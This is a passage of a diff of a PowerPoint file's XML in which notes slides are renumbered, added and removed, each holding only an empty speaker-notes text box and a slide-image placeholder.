+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CE46157-9DCD-CBEC-088B-D31087378EF2}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="125" name="Google Shape;125;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB9F94CC-34F6-A6FC-520A-59F0F2637E5B}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="381000" y="685800"/>
+            <a:ext cx="6096000" cy="3429000"/>
+          </a:xfrm>
+          <a:custGeom>
+            <a:avLst/>
+            <a:gdLst/>
+            <a:ahLst/>
+            <a:cxnLst/>
+            <a:rect l="l" t="t" r="r" b="b"/>
+            <a:pathLst>
+              <a:path w="120000" h="120000" extrusionOk="0">
+                <a:moveTo>
+                  <a:pt x="0" y="0"/>
+                </a:moveTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="0"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="120000"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="0" y="120000"/>
+                </a:lnTo>
+                <a:close/>
+              </a:path>
+            </a:pathLst>
+          </a:custGeom>
+        </p:spPr>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="126" name="Google Shape;126;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71191A9A-D9C4-05C8-7E88-25D272E44786}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="4343400"/>
+            <a:ext cx="5486400" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="178397925"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide20.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -2017,7 +2402,134 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide19.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide21.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 124">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5316C131-8360-F031-F5C7-827ACE228382}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="125" name="Google Shape;125;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D799E0BA-C120-8AE3-F766-C330D2646DFA}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="381000" y="685800"/>
+            <a:ext cx="6096000" cy="3429000"/>
+          </a:xfrm>
+          <a:custGeom>
+            <a:avLst/>
+            <a:gdLst/>
+            <a:ahLst/>
+            <a:cxnLst/>
+            <a:rect l="l" t="t" r="r" b="b"/>
+            <a:pathLst>
+              <a:path w="120000" h="120000" extrusionOk="0">
+                <a:moveTo>
+                  <a:pt x="0" y="0"/>
+                </a:moveTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="0"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="120000"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="0" y="120000"/>
+                </a:lnTo>
+                <a:close/>
+              </a:path>
+            </a:pathLst>
+          </a:custGeom>
+        </p:spPr>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="126" name="Google Shape;126;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{949FDBE1-5FA3-5DE6-F0BC-29CBFDD920AB}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="4343400"/>
+            <a:ext cx="5486400" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3625647215"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide22.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -2144,111 +2656,7 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide2.xml><?xml version="1.0" encoding="utf-8"?>
-<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 124"/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="125" name="Google Shape;125;g3575121a9be_0_1:notes"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="sldImg" idx="2"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="381000" y="685800"/>
-            <a:ext cx="6096000" cy="3429000"/>
-          </a:xfrm>
-          <a:custGeom>
-            <a:avLst/>
-            <a:gdLst/>
-            <a:ahLst/>
-            <a:cxnLst/>
-            <a:rect l="l" t="t" r="r" b="b"/>
-            <a:pathLst>
-              <a:path w="120000" h="120000" extrusionOk="0">
-                <a:moveTo>
-                  <a:pt x="0" y="0"/>
-                </a:moveTo>
-                <a:lnTo>
-                  <a:pt x="120000" y="0"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="120000" y="120000"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="0" y="120000"/>
-                </a:lnTo>
-                <a:close/>
-              </a:path>
-            </a:pathLst>
-          </a:custGeom>
-        </p:spPr>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="126" name="Google Shape;126;g3575121a9be_0_1:notes"/>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="body" idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="685800" y="4343400"/>
-            <a:ext cx="5486400" cy="4114800"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:notes>
-</file>
-
-<file path=ppt/notesSlides/notesSlide20.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide23.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -2375,7 +2783,7 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide21.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide24.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -2502,7 +2910,7 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide22.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide25.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -2629,7 +3037,7 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide23.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide26.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -2756,7 +3164,134 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide24.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide27.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 124">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF8F7E13-2446-F06E-F670-6BFAB0993090}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="125" name="Google Shape;125;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B09690F4-A2A0-E7E5-EEDE-33780E24F1E9}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="381000" y="685800"/>
+            <a:ext cx="6096000" cy="3429000"/>
+          </a:xfrm>
+          <a:custGeom>
+            <a:avLst/>
+            <a:gdLst/>
+            <a:ahLst/>
+            <a:cxnLst/>
+            <a:rect l="l" t="t" r="r" b="b"/>
+            <a:pathLst>
+              <a:path w="120000" h="120000" extrusionOk="0">
+                <a:moveTo>
+                  <a:pt x="0" y="0"/>
+                </a:moveTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="0"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="120000"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="0" y="120000"/>
+                </a:lnTo>
+                <a:close/>
+              </a:path>
+            </a:pathLst>
+          </a:custGeom>
+        </p:spPr>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="126" name="Google Shape;126;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DBA049C-4BBA-15B3-0FC9-68CA958470C3}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="4343400"/>
+            <a:ext cx="5486400" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3953404107"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide28.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -2883,111 +3418,7 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide25.xml><?xml version="1.0" encoding="utf-8"?>
-<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 115"/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="116" name="Google Shape;116;g18d9829d3aa_0_49:notes"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="sldImg" idx="2"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="381000" y="685800"/>
-            <a:ext cx="6096000" cy="3429000"/>
-          </a:xfrm>
-          <a:custGeom>
-            <a:avLst/>
-            <a:gdLst/>
-            <a:ahLst/>
-            <a:cxnLst/>
-            <a:rect l="l" t="t" r="r" b="b"/>
-            <a:pathLst>
-              <a:path w="120000" h="120000" extrusionOk="0">
-                <a:moveTo>
-                  <a:pt x="0" y="0"/>
-                </a:moveTo>
-                <a:lnTo>
-                  <a:pt x="120000" y="0"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="120000" y="120000"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="0" y="120000"/>
-                </a:lnTo>
-                <a:close/>
-              </a:path>
-            </a:pathLst>
-          </a:custGeom>
-        </p:spPr>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="117" name="Google Shape;117;g18d9829d3aa_0_49:notes"/>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="body" idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="685800" y="4343400"/>
-            <a:ext cx="5486400" cy="4114800"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:notes>
-</file>
-
-<file path=ppt/notesSlides/notesSlide26.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide29.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -3107,364 +3538,6 @@
         <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3717877283"/>
       </p:ext>
     </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:notes>
-</file>
-
-<file path=ppt/notesSlides/notesSlide27.xml><?xml version="1.0" encoding="utf-8"?>
-<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 124">
-          <a:extLst>
-            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2D63D99-B6A4-5BF0-6B1C-3E3FBCEBCFDE}"/>
-            </a:ext>
-          </a:extLst>
-        </p:cNvPr>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="125" name="Google Shape;125;g3575121a9be_0_1:notes">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C340010-43FA-F787-50BD-AB746373DC8A}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="sldImg" idx="2"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="381000" y="685800"/>
-            <a:ext cx="6096000" cy="3429000"/>
-          </a:xfrm>
-          <a:custGeom>
-            <a:avLst/>
-            <a:gdLst/>
-            <a:ahLst/>
-            <a:cxnLst/>
-            <a:rect l="l" t="t" r="r" b="b"/>
-            <a:pathLst>
-              <a:path w="120000" h="120000" extrusionOk="0">
-                <a:moveTo>
-                  <a:pt x="0" y="0"/>
-                </a:moveTo>
-                <a:lnTo>
-                  <a:pt x="120000" y="0"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="120000" y="120000"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="0" y="120000"/>
-                </a:lnTo>
-                <a:close/>
-              </a:path>
-            </a:pathLst>
-          </a:custGeom>
-        </p:spPr>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="126" name="Google Shape;126;g3575121a9be_0_1:notes">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F09E7A92-5FFF-E6CC-B5EF-E2E01FD9DF30}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="body" idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="685800" y="4343400"/>
-            <a:ext cx="5486400" cy="4114800"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="735788653"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:notes>
-</file>
-
-<file path=ppt/notesSlides/notesSlide28.xml><?xml version="1.0" encoding="utf-8"?>
-<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 124">
-          <a:extLst>
-            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2987C4B5-9791-F752-496A-FC6655DF675A}"/>
-            </a:ext>
-          </a:extLst>
-        </p:cNvPr>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
